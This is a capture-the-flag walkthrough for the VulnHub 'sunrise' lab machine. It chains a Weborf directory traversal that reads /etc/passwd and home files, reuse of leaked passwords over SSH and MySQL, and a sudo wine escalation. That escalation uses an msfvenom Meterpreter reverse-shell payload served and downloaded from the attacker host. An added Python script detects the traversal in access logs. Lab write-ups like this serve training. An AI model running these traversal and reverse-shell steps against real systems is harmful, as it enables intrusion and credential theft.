Morning~~~
Address: http://www.vulnhub.com/entry/sunset-sunrise,406/
Focus on the tools and the approach.
nmap 192.168.43.0/24
Target IP
192.168.43.11
nmap -A -p1-65535 192.168.43.11
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql
8080/tcp open http-proxy http-proxy Weborf (GNU/Linux)
http://192.168.43.11/
http://192.168.43.11:8080/ reveals Weborf/0.12.2 (GNU/Linux)
Weborf/0.12.2 has a directory traversal vulnerability
https://www.exploit-db.com/exploits/14925
View the user list
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Entries of interest
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
View the home directory; it holds exactly the two users above
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f
dirb http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf
The following are accessible
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.profile
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history
This shows ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.bashrc
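Added example, not part of the original walkthrough: a detection check for the encoded traversal requests above. It percent-decodes each request path (double encoding included) and flags any path that climbs above the document root. The log format, sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the target or the page).
SAMPLE_LOG = [
    '192.168.43.154 "GET /index.html HTTP/1.1" 200',
    '192.168.43.154 "GET /..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200',
    '192.168.43.154 "GET /docs/%2e%2e/img/logo.png HTTP/1.1" 200',
    '192.168.43.154 "GET /a/..%252f..%252f..%252fhome%252f HTTP/1.1" 404',
    '192.168.43.154 "GET /files/report..final.pdf HTTP/1.1" 200',
]

# Assumed log layout: the request line is quoted, as in common access logs.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly so double encoding (%252f) is unwrapped too."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_root(request_path):
    """Return True if the decoded path climbs above the document root."""
    path = fully_decode(request_path.split("?", 1)[0]).replace("\\", "/")
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:  # more ".." than directories entered so far
                return True
        else:
            depth += 1
    return False


def flag_traversal(lines):
    """Return the raw request paths that resolve outside the document root."""
    paths = (m.group(1) for m in map(REQUEST_RE.search, lines) if m)
    return [p for p in paths if escapes_root(p)]


if __name__ == "__main__":
    for hit in flag_traversal(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

Tracking depth instead of matching the string `../` keeps benign requests such as `/docs/%2e%2e/img/logo.png` and `report..final.pdf` out of the alerts.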
ssh [email protected], enter iheartrainbows44 to log in
uname -a
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
mysql -uweborf -p, the password is again iheartrainbows44
show databases;
use mysql;
show tables;
select Host,User,Password from user;
localhost | sunrise | thefutureissobrightigottawearshades
su sunrise, enter the password thefutureissobrightigottawearshades, which gives sunrise@sunrise:/home/weborf$
sudo -l
This shows (root) /usr/bin/wine
Privilege escalation information-gathering script
https://github.com/sleventyeleven/linuxprivchecker
msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.43.154 lport=4444 >muma.exe
python3 -m http.server 80
On the target machine
wget http://192.168.43.154/muma.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
sudo /usr/bin/wine muma.exe
Password: thefutureissobrightigottawearshades
This gives a shell directly
meterpreter >
cd /root
cat root.txt
24edb59d21c273c033aa6f1689b0b18c
Alternatively, run sudo /usr/bin/wine cmd.exe directly on the target
cd /root
type root.txt
24edb59d21c273c033aa6f1689b0b18c